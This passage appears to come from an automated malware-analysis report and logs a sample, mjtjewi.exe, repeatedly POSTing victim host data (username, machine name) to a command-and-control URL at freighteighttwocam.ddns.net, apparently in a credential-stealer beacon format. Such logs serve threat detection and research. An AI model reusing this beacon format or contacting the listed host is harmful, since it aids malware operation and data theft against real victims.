                                                        Oct 3, 2024 09:21:09.997520924 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:10.836468935 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:10 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.116436445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:10.991457939 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:10.996788025 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:11.917808056 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:11 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.
                                                        Oct 3, 2024 09:21:11.918284893 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:11 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.116436545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:12.107372999 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:12.112320900 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:12.880244970 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:12 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.116436645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:13.046875954 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:13.055507898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:13.766148090 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:13 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.116436745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:13.911133051 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:13.916853905 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:14.575090885 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:14 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.116436845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:14.876427889 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:14.881237984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:15.898722887 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:15 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.116436945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:16.055149078 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:16.059968948 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:16.915457964 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:16 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.116437045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:17.076250076 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:17.083632946 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:17.866369963 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:17 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.116437145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:18.018455029 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:18.023488045 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:19.008034945 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:18 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.116437245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:19.169938087 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:19.175709009 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:21.428244114 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:20 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.116437345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:21.587904930 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:21.592823982 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:22.234579086 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:21 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.116437445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:22.381572008 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:22.386914968 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:23.090107918 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:22 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.116437545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:23.241945982 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:23.246841908 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:23.948323011 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:23 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.116437645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:24.099610090 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:24.104473114 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:24.875488997 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:24 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.116437845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:25.024096966 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:25.029227972 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:25.669203997 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:25 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.116437945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:25.815433979 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:25.820374966 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:26.688807011 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:26 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.116438045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:26.846657991 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:26.851586103 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:27.634349108 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:27 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.116438145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:27.805084944 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:27.810226917 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:28.548094988 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:28 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.116438245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:28.692899942 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:28.697925091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:29.432213068 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:28 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.116438345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:29.586962938 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
